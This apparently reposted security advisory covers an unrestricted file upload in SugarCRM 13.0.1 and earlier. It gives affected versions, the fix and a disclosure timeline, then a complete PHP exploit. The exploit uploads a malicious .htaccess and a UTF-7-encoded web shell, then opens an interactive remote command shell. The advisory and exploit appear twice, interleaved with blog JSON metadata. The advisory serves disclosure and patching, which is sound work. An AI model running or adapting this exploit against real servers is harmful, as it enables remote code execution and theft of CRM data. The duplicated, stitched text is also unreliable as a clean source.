——————————————————————————-\nSugarCRM <= 13.0.1 (set_note_attachment) Unrestricted File Upload\nVulnerability\n——————————————————————————-<\/p>\n[-] Software Link:<\/p>\n
Home<\/a><\/p><\/blockquote>\n<\/iframe><\/p>\n[-] Affected Versions:<\/p>\n<p>Version 13.0.1 and prior versions.<br \/>\nVersion 12.0.3 and prior versions.<\/p>\n[-] Vulnerability Description:<\/p>\n<p>When handling the “set_note_attachment” SOAP call, the application<br \/>\nallows uploading of<br \/>\nany kind of file into \/upload\/ directory. This one is protected by the<br \/>\nmain SugarCRM<br \/>\n.htaccess file, i.e. it doesn’t allow access\/execution of PHP files.<br \/>\nHowever, this<br \/>\nbehavior can be overridden if the subdirectory contains another<br \/>\n.htaccess file.<br \/>\nSo, an attacker can leverage the vulnerability to firstly upload a new<br \/>\n.htaccess<br \/>\nfile and then to upload the PHP code they want to execute.<\/p>\n[-] Proof of Concept:<\/p>\n<p>https:\/\/karmainsecurity.com\/pocs\/KIS-2023-11.php<\/p>\n<p>(Packet Storm note: POC included at bottom)<\/p>\n[-] Solution:<\/p>\n<p>Upgrade to version 13.0.2, 12.0.4, or later.<\/p>\n[-] Disclosure Timeline:<\/p>\n[23\/04\/2023] – Vendor notified<br \/>\n[21\/09\/2023] – Fixed versions released<br \/>\n[06\/10\/2023] – CVE identifier requested<br \/>\n[26\/10\/2023] – Publication of this advisory<\/p>\n[-] CVE Reference:<\/p>\n<p>The Common Vulnerabilities and Exposures project (cve.mitre.org)<br \/>\nhas not assigned a CVE identifier for this vulnerability.<\/p>\n[-] Credits:<\/p>\n<p>Vulnerability discovered by Egidio Romano.<\/p>\n[-] Original Advisory:<\/p>\n<p>https:\/\/karmainsecurity.com\/KIS-2023-11<\/p>\n[-] Other References:<\/p>\n<p>https:\/\/support.sugarcrm.com\/resources\/security\/sugarcrm-sa-2023-011\/<\/p>\n<p>— KIS-2023-11.php poc —<\/p>\n<p><?php<\/p>\n<p>set_time_limit(0);<br \/>\nerror_reporting(E_ERROR);<\/p>\n<p>if (!extension_loaded(“curl”)) die(“[+] cURL extension required!\\n”);<\/p>\n<p>if ($argc != 4) die(“Usage: php $argv[0] <URL> <username> <password>\\n”);<\/p>\n<p>list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];<\/p>\n<p>print “[+] Logging in with username ‘{$user}’ and password ‘{$pass}’\\n”;<\/p>\n<p>$ch = curl_init();<\/p>\n<p>$params = [“username” => $user, “password” => $pass, “grant_type” => “password”, “client_id” => “sugar”];<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}rest\/v10\/oauth2\/token”);<br \/>\ncurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“Content-Type: application\/json”]);<br \/>\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br \/>\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<\/p>\n<p>if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die(“[+] Login failed!\\n”);<\/p>\n<p>print “[+] Creating new Notes bean (ID: .htaccess)\\n”;<\/p>\n<p>$note_id = “.htaccess”;<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}rest\/v10\/Notes”);<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“Content-Type: application\/json”, “OAuth-Token: {$token}”]);<br \/>\ncurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([“id” => $note_id]));<\/p>\n<p>if (!preg_match(“\/$note_id\/”, curl_exec($ch))) die(“[+] Bean creation failed!\\n”);<\/p>\n<p>print “[+] Creating new Notes bean (ID: sh.php)\\n”;<\/p>\n<p>$note_id = “sh.php”;<\/p>\n<p>curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([“id” => $note_id]));<\/p>\n<p>if (!preg_match(“\/$note_id\/”, curl_exec($ch))) die(“[+] Bean creation failed!\\n”);<\/p>\n<p>require_once(“.\/lib\/nusoap.php”);<br \/>\n$client = new nusoap_client(“{$url}soap.php”, false);<\/p>\n<p>if (($err = $client->getError()))<br \/>\n{<br \/>\necho “\\nConstructor error: $err”;<br \/>\necho “\\nDebug: ” . $client->getDebug() . “\\n”;<br \/>\ndie();<br \/>\n}<\/p>\n<p>print “[+] Sending SOAP login request\\n”;<\/p>\n<p>$params = [“user_auth” => [“user_name” => $user, “password” => $pass]];<br \/>\n$session = $client->call(‘login’, $params);<\/p>\n<p>if ($session[‘id’] == -1) die(“[+] SOAP login failed!\\n”);<\/p>\n<p>print “[+] Uploading .htaccess through ‘set_note_attachment’\\n”;<\/p>\n<p>$htaccess = “RewriteEngine on\\nRewriteBase \/upload\\nRewriteRule ^(.*)$ – [L]\\nphp_flag zend.multibyte 1\\nphp_value zend.script_encoding \\”UTF-7\\””;<br \/>\n$params = [“session” => $session[‘id’], “note” => [“id” => “.htaccess”, “file” => base64_encode($htaccess)]];<\/p>\n<p>$client->call(“set_note_attachment”, $params);<\/p>\n<p>print “[+] Uploading shell through ‘set_note_attachment’\\n”;<\/p>\n<p>$shell = “+ADw?php passthru(\\$_SERVER[‘HTTP_CMD’]); ?>”;<br \/>\n$params = [“session” => $session[‘id’], “note” => [“id” => “sh.php”, “file” => base64_encode($shell)]];<\/p>\n<p>$client->call(“set_note_attachment”, $params);<\/p>\n<p>print “[+] Launching shell\\n”;<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}upload\/sh.php”);<\/p>\n<p>while(1)<br \/>\n{<br \/>\nprint “\\nsugar-shell# “;<br \/>\nif (($cmd = trim(fgets(STDIN))) == “exit”) break;<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“CMD: “.$cmd]);<br \/>\n($r = curl_exec($ch)) ? print $r : die(“\\n[+] Exploit failed!\\n”);<br \/>\n}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>——————————————————————————- SugarCRM <= 13.0.1 (set_note_attachment) Unrestricted File Upload Vulnerability ——————————————————————————- [-] Software Link: Home [-] Affected Versions: Version 13.0.1 and prior versions. Version 12.0.3 and prior versions. [-] Vulnerability Description: When handling the “set_note_attachment” SOAP call, the application allows uploading of any kind of file into \/upload\/ directory. This one is protected by the main …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-50652","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50652","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=50652"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50652\/revisions"}],"predecessor-version":[{"id":50761,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50652\/revisions\/50761"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=50652"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=50652"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=50652"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
<\/iframe><\/p>\n[-] Affected Versions:<\/p>\n<p>Version 13.0.1 and prior versions.<br \/>\nVersion 12.0.3 and prior versions.<\/p>\n[-] Vulnerability Description:<\/p>\n<p>When handling the “set_note_attachment” SOAP call, the application<br \/>\nallows uploading of<br \/>\nany kind of file into \/upload\/ directory. This one is protected by the<br \/>\nmain SugarCRM<br \/>\n.htaccess file, i.e. it doesn’t allow access\/execution of PHP files.<br \/>\nHowever, this<br \/>\nbehavior can be overridden if the subdirectory contains another<br \/>\n.htaccess file.<br \/>\nSo, an attacker can leverage the vulnerability to firstly upload a new<br \/>\n.htaccess<br \/>\nfile and then to upload the PHP code they want to execute.<\/p>\n[-] Proof of Concept:<\/p>\n<p>https:\/\/karmainsecurity.com\/pocs\/KIS-2023-11.php<\/p>\n<p>(Packet Storm note: POC included at bottom)<\/p>\n[-] Solution:<\/p>\n<p>Upgrade to version 13.0.2, 12.0.4, or later.<\/p>\n[-] Disclosure Timeline:<\/p>\n[23\/04\/2023] – Vendor notified<br \/>\n[21\/09\/2023] – Fixed versions released<br \/>\n[06\/10\/2023] – CVE identifier requested<br \/>\n[26\/10\/2023] – Publication of this advisory<\/p>\n[-] CVE Reference:<\/p>\n<p>The Common Vulnerabilities and Exposures project (cve.mitre.org)<br \/>\nhas not assigned a CVE identifier for this vulnerability.<\/p>\n[-] Credits:<\/p>\n<p>Vulnerability discovered by Egidio Romano.<\/p>\n[-] Original Advisory:<\/p>\n<p>https:\/\/karmainsecurity.com\/KIS-2023-11<\/p>\n[-] Other References:<\/p>\n<p>https:\/\/support.sugarcrm.com\/resources\/security\/sugarcrm-sa-2023-011\/<\/p>\n<p>— KIS-2023-11.php poc —<\/p>\n<p><?php<\/p>\n<p>set_time_limit(0);<br \/>\nerror_reporting(E_ERROR);<\/p>\n<p>if (!extension_loaded(“curl”)) die(“[+] cURL extension required!\\n”);<\/p>\n<p>if ($argc != 4) die(“Usage: php $argv[0] <URL> <username> <password>\\n”);<\/p>\n<p>list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];<\/p>\n<p>print “[+] Logging in with username ‘{$user}’ and password ‘{$pass}’\\n”;<\/p>\n<p>$ch = curl_init();<\/p>\n<p>$params = [“username” => $user, “password” => $pass, “grant_type” => “password”, “client_id” => “sugar”];<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}rest\/v10\/oauth2\/token”);<br \/>\ncurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“Content-Type: application\/json”]);<br \/>\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br \/>\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<\/p>\n<p>if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die(“[+] Login failed!\\n”);<\/p>\n<p>print “[+] Creating new Notes bean (ID: .htaccess)\\n”;<\/p>\n<p>$note_id = “.htaccess”;<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}rest\/v10\/Notes”);<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“Content-Type: application\/json”, “OAuth-Token: {$token}”]);<br \/>\ncurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([“id” => $note_id]));<\/p>\n<p>if (!preg_match(“\/$note_id\/”, curl_exec($ch))) die(“[+] Bean creation failed!\\n”);<\/p>\n<p>print “[+] Creating new Notes bean (ID: sh.php)\\n”;<\/p>\n<p>$note_id = “sh.php”;<\/p>\n<p>curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([“id” => $note_id]));<\/p>\n<p>if (!preg_match(“\/$note_id\/”, curl_exec($ch))) die(“[+] Bean creation failed!\\n”);<\/p>\n<p>require_once(“.\/lib\/nusoap.php”);<br \/>\n$client = new nusoap_client(“{$url}soap.php”, false);<\/p>\n<p>if (($err = $client->getError()))<br \/>\n{<br \/>\necho “\\nConstructor error: $err”;<br \/>\necho “\\nDebug: ” . $client->getDebug() . “\\n”;<br \/>\ndie();<br \/>\n}<\/p>\n<p>print “[+] Sending SOAP login request\\n”;<\/p>\n<p>$params = [“user_auth” => [“user_name” => $user, “password” => $pass]];<br \/>\n$session = $client->call(‘login’, $params);<\/p>\n<p>if ($session[‘id’] == -1) die(“[+] SOAP login failed!\\n”);<\/p>\n<p>print “[+] Uploading .htaccess through ‘set_note_attachment’\\n”;<\/p>\n<p>$htaccess = “RewriteEngine on\\nRewriteBase \/upload\\nRewriteRule ^(.*)$ – [L]\\nphp_flag zend.multibyte 1\\nphp_value zend.script_encoding \\”UTF-7\\””;<br \/>\n$params = [“session” => $session[‘id’], “note” => [“id” => “.htaccess”, “file” => base64_encode($htaccess)]];<\/p>\n<p>$client->call(“set_note_attachment”, $params);<\/p>\n<p>print “[+] Uploading shell through ‘set_note_attachment’\\n”;<\/p>\n<p>$shell = “+ADw?php passthru(\\$_SERVER[‘HTTP_CMD’]); ?>”;<br \/>\n$params = [“session” => $session[‘id’], “note” => [“id” => “sh.php”, “file” => base64_encode($shell)]];<\/p>\n<p>$client->call(“set_note_attachment”, $params);<\/p>\n<p>print “[+] Launching shell\\n”;<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}upload\/sh.php”);<\/p>\n<p>while(1)<br \/>\n{<br \/>\nprint “\\nsugar-shell# “;<br \/>\nif (($cmd = trim(fgets(STDIN))) == “exit”) break;<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“CMD: “.$cmd]);<br \/>\n($r = curl_exec($ch)) ? print $r : die(“\\n[+] Exploit failed!\\n”);<br \/>\n}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>——————————————————————————- SugarCRM <= 13.0.1 (set_note_attachment) Unrestricted File Upload Vulnerability ——————————————————————————- [-] Software Link: Home [-] Affected Versions: Version 13.0.1 and prior versions. Version 12.0.3 and prior versions. [-] Vulnerability Description: When handling the “set_note_attachment” SOAP call, the application allows uploading of any kind of file into \/upload\/ directory. This one is protected by the main …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-50652","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50652","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=50652"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50652\/revisions"}],"predecessor-version":[{"id":50761,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50652\/revisions\/50761"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=50652"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=50652"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=50652"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}